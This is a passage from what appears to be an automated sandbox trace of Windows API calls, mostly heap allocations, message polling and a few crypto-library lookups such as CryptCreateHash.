Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0263.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.151] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.151] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.151] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.152] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.152] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.152] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.153] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.153] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0263.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.154] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.154] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.192] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.192] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.193] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.193] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.193] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0263.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.194] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.194] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.194] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0263.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0263.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.195] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0263.196] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 